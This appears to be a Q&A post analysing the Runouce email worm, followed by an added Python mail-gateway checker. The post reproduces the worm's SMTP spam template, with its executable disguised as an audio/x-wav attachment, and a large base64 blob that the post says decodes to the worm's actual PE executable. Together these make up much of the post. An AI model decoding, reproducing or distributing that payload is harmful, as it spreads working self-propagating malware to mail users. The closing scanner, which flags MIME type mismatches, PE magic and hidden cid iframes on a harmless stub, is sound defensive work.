Network behavior of Worm/Win32.Runouce.b[Email]

As stated in the title.

Answer 1  2016-06-04

Protocol: TCP
Port: 139 445
Description: sends malicious email over the above ports; email content:
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO:
DATA
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
--#BOUNDARY#
Content-Type: text/html
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name=pp.exe
Content-id: THE-CID
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
WFP/VmBo9AEAAP9WRMzpWIvM6A4AAABHZXRTeXN0ZW1UaW1lAOgRAAAAR2V0Q29tcHV0ZXJOYW1lQQDoFAAAAFdpZGVDaGFyVG9
NdWx0aUJ5dGUA6BAAAABUZXJtaW5hdGVUaHJlYWQA6A0AAABDcmVhdGVUaHJlYWQA6AgAAABfbGNyZWF0AOgUAAAAR2V0U3lzdG
VtRGlyZWN0b3J5QQDoDwAAAFZpcnR1YWxBbGxvY0V4AOgUAAAAV2FpdEZvclNpbmdsZU9iamVjdADoDAAAAENsb3NlSGFuZGxlA
OgTAAAAQ3JlYXRlS2VybmVsVGhyZWFkAOgTAAAAQ3JlYXRlUmVtb3RlVGhyZWFkAOgTAAAAV3JpdGVQcm9jZXNzTWVtb3J5AOgM
AAAAT3BlblByb2Nlc3MA6BQAAABHZXRDdXJyZW50UHJvY2Vzc0lkAOgXAAAAUmVnaXN0ZXJTZXJ2aWNlUHJvY2VzcwDoBgAAAFN
sZWVwAOgIAAAAX2xjbG9zZQDoCAAAAF9sbHNlZWsA6AgAAABfbHdyaXRlAOgHAAAAX2xyZWFkAOgHAAAAX2xvcGVuAOgMAAAAU2
V0RmlsZVRpbWUA6BMAAABTZXRGaWxlQXR0cmlidXRlc0EA6AoAAABGaW5kQ2xvc2UA6A4AAABGaW5kTmV4dEZpbGVBAOgPAAAAR
mluZEZpcnN0RmlsZUEA6BUAAABTZXRDdXJyZW50RGlyZWN0b3J5QQDoDgAAAEdldERyaXZlVHlwZUEA6AgAAABXaW5FeGVjAOgQ
AAAAR2V0Q29tbWFuZExpbmVBAOgNAAAAR2V0TGFzdEVycm9yAOgNAAAAQ3JlYXRlTXV0ZXhBAOgNAAAATG9hZExpYnJhcnlBACv
MwekC/+DpWIvM6AoAAAB3c3ByaW50ZkEA6A0AAABTZW5kTWVzc2FnZUEA6AoAAABHZXRXaW5kb3cA6AwAAABNZXNzYWdlQm94QQ
DoDAAAAEZpbmRXaW5kb3dBAOgZAAAAR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkACvMwekC/+DpWIvM6BgAAABSZWdOb3RpZnlDa
GFuZ2VLZXlWYWx1ZQDoEQAAAFJlZ1F1ZXJ5VmFsdWVFeEEA6A8AAABSZWdTZXRWYWx1ZUV4QQDoDAAAAFJlZ09wZW5LZXlBACvM
wekC/+DpWIvM6A4AAABXTmV0Q2xvc2VFbnVtAOgSAAAAV05ldEVudW1SZXNvdXJjZUEA6A4AAABXTmV0T3BlbkVudW1BACvMwek
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
wL+xorB/KrrlFP/VkCBxAABAABhycIEAMgAAABgagD/dQj/VjCD+P90cIvYgewAAQAAi/xoAAEAAFdT/1Y0PQABAAB1S4tHYGoA
UFP/VjyLT2SB+QAQAAB3NlFqRFdT/1Y0gewAAQAAi8RqAGoAaAABAABQav9XaAACAABqAP9WfFTovP7//4HEAAEAAFniyoHEAAE
AAFP/VkBhycIEAMgEAABgiWX8gewAEAAAi/z/dQhX6AoCAABQV/91EP9WOIHsABAAAIkEJIHsABAAAIkEJIHsABAAAIkEJIv8aA
AwAABX/3UM/1Y0g/j/dEiL1IHsABAAAIkEJIHsABAAAIkEJIHsABAAAIkEJIHsABAAAIkEJIv8V1BS6AYEAABQV/91EP9WOMcEJ
A0KDQpqBFf/dRD/VjiLZfxhuAEAAADJwgwAyAgAAGCJZfzHRfgAAAAAgewAEAAAi/xUaAEBAAD/lrwAAAALwA+FSQEAAGoAagFq
Av+W1AAAAIP4/w+ELgEAAIvYZscHAgBqGf+WyAAAAGaJRwLoDwAAAGJ0YW1haWwubmV0LmNuAP+WzAAAAAvAD4TyAAAAi0AQiwC
JRwRqEFdT/5bQAAAAg/j/D4TXAAAA/3UIV+jmAAAAagBQV1P/lsQAAABooA8AAP9WRIHsABAAAIkEJIHsABAAAIkEJIHsABAAAI
kEJIv8aAAwAABX/3UM/1Y0g/j/D4SJAAAAgewAEAAAiQQkgewAEAAAiQQkgewAEAAAiQQkgewAEAAAiQQki9RSUFfo1QIAAIv8a
gBQV1P/lsQAAABooA8AAP9WROgFAAAADQouDQpYagBqBVBT/5bEAAAAaKAPAAD/VkToBgAAAFFVSVQNClhqAGoGUFP/lsQAAABo
oA8AAP9WRMdF+AEAAABT/5bYAAAA/5bAAAAAi2X8YYtF+MnCCADIBAAAYLgAAQAAK+CL1FBUUv+WgAAAAFjoHQIAAEhFTE8gYnR
hbWFpbC5uZXQuY24NCk1BSUwgRlJPTTogaW1pc3N5b3VAYnRhbWFpbC5uZXQuY24NClJDUFQgVE86ICVzDQpEQVRBDQpGUk9NOi
Alc0B5YWhvby5jb20NClRPOiAlcw0KU1VCSkVDVDogJXMgaXMgY29tbWluZyENCk1JTUUtVmVyc2lvbjogMS4wDQpDb250ZW50L
XR5cGU6IG11bHRpcGFydC9taXhlZDsgYm91bmRhcnk9IiNCT1VOREFSWSMiDQoNCi0tI0JPVU5EQVJZIw0KQ29udGVudC1UeXBl
OiB0ZXh0L2h0bWwNCkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6IHF1b3RlZC1wcmludGFibGUNCg0KPGh0bWw+PEhFQUQ+PC9
IRUFEPjxib2R5IGJnQ29sb3I9M0QjZmZmZmZmPjxpZnJhbWUgc3JjPTNEY2lkOlRIRS1DSUQgaGVpZ2h0PTNEMCB3aWR0aD0zRD
A+PC9pZnJhbWU+PC9ib2R5PjwvaHRtbD4NCg0KLS0jQk9VTkRBUlkjDQpNSU1FLVZlcnNpb246IDEuMA0KQ29udGVudC1UeXBlO
iBhdWRpby94LXdhdjsgbmFtZT0icHAuZXhlIg0KQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogYmFzZTY0DQpDb250ZW50LWlk
OiBUSEUtQ0lEDQoNCgBYi/xX/3UMV/91DFD/dQj/lpwAAACL54lF/IHEAAEAAGGLRfzJwggAyAQAAGDHRfwAAAAA6EEAAABBQkN
ERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvAF6LfRCLVQzB4gMz2z
PAuQYAAADR4FP/dQjoMAAAAEp0DUPi74oEBvyq/0X8695J0+CKBAb8qv9F/NHpAU38sD3886oywKphi0X8ycIMAMgAAABRUlaLd
QiLTQyL0cHqA4oUFvbRgOEH0uqA4gEKwl5aWcnCCABYUegDAAAA6zrpZGf/NgAAZGeJJgAA6BwAAAD/Moki/+DpWOgPAAAAiyKP
AmRnjwYAAFlZ/+Dp6AQAAACI/hIAWsPpyAAAAOgIAAAA6NH/////4elZi0UQiYi4AAAAM8DJwhAA6GcBAABNWlAAAQIAAwQAAQ8
AAf//AAK4AAdAAAEaACIBAAK6EAABDh+0Cc0huAFMzSGQkFRoaXMgcHJvZ3JhbSBtdXN0IGJlIHJ1biB1bmRlciBXaW4zMg0KJD
cAiFBFAAJMAQQAAbUs74IACOAAAY6BCwECGQABAgADBgAHEAADEAADIAAEQAACEAADAgACAQAHAwABCgAGUAADBAAGAgAFEAACI
AAEEAACEAAGEAAMMAACTgAcQAACDABTQ09ERQAFEAADEAADAgADBgAOIAACYERBVEEABRAAAyAAAwIAAwgADkAAAsAuaWRhdGEA
AxAAAzAAAwIAAwoADkAAAsAucmVsb2MAAxAAA0AAAwIAAwwADkAAAlAA/wD/AP8Aa8P/JTAwQAD/AP8A/wD9KDAACjgwAAIwMAA
WRjAABkYwAAZLRVJORUwzMi5kbGwABFNsZWVwAP8AtRAAAgwAAwMwAP8A/wD/APkAAF+KB0cKwHQNUIvEagFQU/9WOFjr7A+2D0
fjEVFQi8RqAVBT/1Y4WFni8evVw+nIAAAAgewAAQAAM/aL/Ga4DQq5DAAAAPzzZqvo9vD//4sUtAPhigJC/KoKwHX36AkAAAC3o
svNz/vPogDoBAAAAMbz03dYagD/EAvAdFeL2OgEAAAAmMLRd1hqBVP/EAvAdEKL2OgEAAAAruLRd1+B7AAQAABUaAAQAABqDVP/
F4HEABAAAAvAdRtUaAAQAABqDFP/F0aD5gd1CoHEAAEAAMnCBADoBAAAAEIkgHxYaPQBAAD/EOlR////6cgAAACLXQiB7AABAAC
L/OgIAAAAUnVub25jZQBeaAABAADoBAAAAOb1bnlYVFdqAGoAVlP/EFjoBAAAALj/bnlYagBqAGoEagBT/xDoBAAAAEHobnlYaA
ABAABXagFqAFZT/xDr0enIAAAA6AQAAACtaeh3WP91CGoAaP8PHwD/EAvAdCyL2OgEAAAAALTmd1hq/1P/EOgAAAAAWYPBGpCQk
OgEAAAAKnXod1hqAVH/EMnCBADpyAAAAGBQDwFMJP5Yg8AYixiLUAToCwAAAGCJGIlQBPzzpGHP+maPAGaPQAaLdQiLfQyLTRDM
+2HJwgwA6cgAAABgi0UIagBQUGoA/5aQAAAAYcnCBAAAAAAAAAAAAMMAAAAAAAAAAAAAAAAAAAA=
Decoded data: HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO:
DATA
FROM: %s@yahoo.com
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary=#BOUNDARY#
--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name=pp.exe
Content-Transfer-Encoding: base64
Content-id: THE-CID
[The rest of the decoded data is the PE image itself; it renders as mojibake and is omitted here. Readable strings in it include "This program must be run under Win32", the section names CODE, DATA, .idata and .reloc, KERNEL32.dll, Sleep, GetProcAddress, the library names USER32.DLL, ADVAPI32.DLL, MPR.DLL and WSOCK32.DLL, the string ChineseHacker-2, the message "Net Send * My god! Some one killed ChineseHacker-2 Monitor", the MIME header template shown above, the base64 alphabet ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, and "Runonce".]
After decoding, the content turns out to be a PE executable. The virus calls the system's built-in Outlook Express to send malicious email, and it spreads itself by sending that email.
Note: %System32% is a variable path. The virus determines the location of the current System folder by querying the operating system.
%Windir%     the directory Windows is installed in
%DriveLetter%   the root directory of a logical drive
%ProgramFiles%      the default installation directory for programs
%HomeDrive%   the partition the currently booted system resides on
%Documents and Settings%  the root of the current user's documents
%Temp%  \Documents and Settings\[current user]\Local Settings\Temp
%System32%  the system's System32 folder
On Windows 2000/NT the default installation path is C:\Winnt\System32
On Windows 95/98/Me the default installation path is %WINDOWS%\System
On Windows XP the default installation path is %system32%
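The email structure quoted in the answer above is a useful test case for a mail-gateway check: an attachment declared as audio/x-wav but named pp.exe, a base64 body that is a PE image (the quoted data begins with the MZ header), and a text/html part followed by a part carrying Content-id: THE-CID (the base64 blob on the page also contains the HTML template with an iframe whose src is cid:THE-CID and whose height and width are 0). The following is an added example, not code from the original answer; it uses Python's standard email parser, and the sample message, its addresses and the stub attachment are constructed here, so the "attachment" is a harmless MZ stub rather than the worm's payload.

```python
"""Added defender-side example: parse a raw MIME message and flag the
indicators the worm's email shows. Three data checks on the parsed parts:
  1. type-name-mismatch: filename has an executable extension but the
     declared Content-Type is not an application/* type,
  2. pe-magic: a non-application part whose decoded body starts with "MZ",
  3. html-iframe-cid: an HTML part that loads another part by cid: in an
     <iframe>.
SAMPLE_MAIL and CLEAN_MAIL are constructed; addresses are placeholders.
"""
import base64
import email
import re
from email import policy

EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd"}

# Constructed stand-in for the attachment: PE magic plus zero padding.
_STUB_PE_B64 = base64.b64encode(b"MZ" + b"\x00" * 62).decode("ascii")

# Same shape as the worm's mail template quoted in the answer.
SAMPLE_MAIL = (
    "From: sender@example.invalid\r\n"
    "To: victim@example.invalid\r\n"
    "Subject: A-738DF22C9CA04 is comming!\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="#BOUNDARY#"\r\n'
    "\r\n"
    "--#BOUNDARY#\r\n"
    "Content-Type: text/html\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n"
    "\r\n"
    "<html><HEAD></HEAD><body bgColor=3D#ffffff>"
    "<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>\r\n"
    "--#BOUNDARY#\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: audio/x-wav; name="pp.exe"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    "Content-id: THE-CID\r\n"
    "\r\n"
    f"{_STUB_PE_B64}\r\n"
    "--#BOUNDARY#--\r\n"
)

# A plain message that must produce no findings.
CLEAN_MAIL = (
    "From: sender@example.invalid\r\n"
    "To: victim@example.invalid\r\n"
    "Subject: meeting notes\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    "See you at ten.\r\n"
)

_IFRAME_CID = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?cid:", re.IGNORECASE)


def file_extension(filename):
    """Lower-cased extension of a filename, or '' if it has none."""
    dot = filename.rfind(".")
    return filename[dot:].lower() if dot >= 0 else ""


def analyze_message(raw):
    """Return a list of finding strings for one raw RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue  # containers carry no body of their own
        ctype = part.get_content_type()
        filename = part.get_filename() or ""   # Content-Type name= counts too
        body = part.get_payload(decode=True) or b""  # undoes base64 / QP
        if ctype == "text/html":
            html = body.decode("ascii", errors="replace")
            if _IFRAME_CID.search(html):
                findings.append("html-iframe-cid: HTML part embeds a cid: part in an <iframe>")
        if file_extension(filename) in EXEC_EXTENSIONS and not ctype.startswith("application/"):
            findings.append(f"type-name-mismatch: {filename} declared as {ctype}")
        if body[:2] == b"MZ" and not ctype.startswith("application/"):
            findings.append(f"pe-magic: {ctype} part body starts with MZ")
    return findings


def is_suspicious(raw):
    """True when any rule fires; a gateway would quarantine on this."""
    return bool(analyze_message(raw))


if __name__ == "__main__":
    for name, mail in (("sample", SAMPLE_MAIL), ("clean", CLEAN_MAIL)):
        print(name, analyze_message(mail) or "no findings")
```

The checks deliberately ignore the declared Content-Type when deciding what the body is: the worm's mail depends on a client trusting audio/x-wav, so the gateway sniffs the decoded bytes and compares the filename against the declared type instead. The same logic applies to the readme.eml pattern, since an .eml attachment containing this structure parses the same way once extracted.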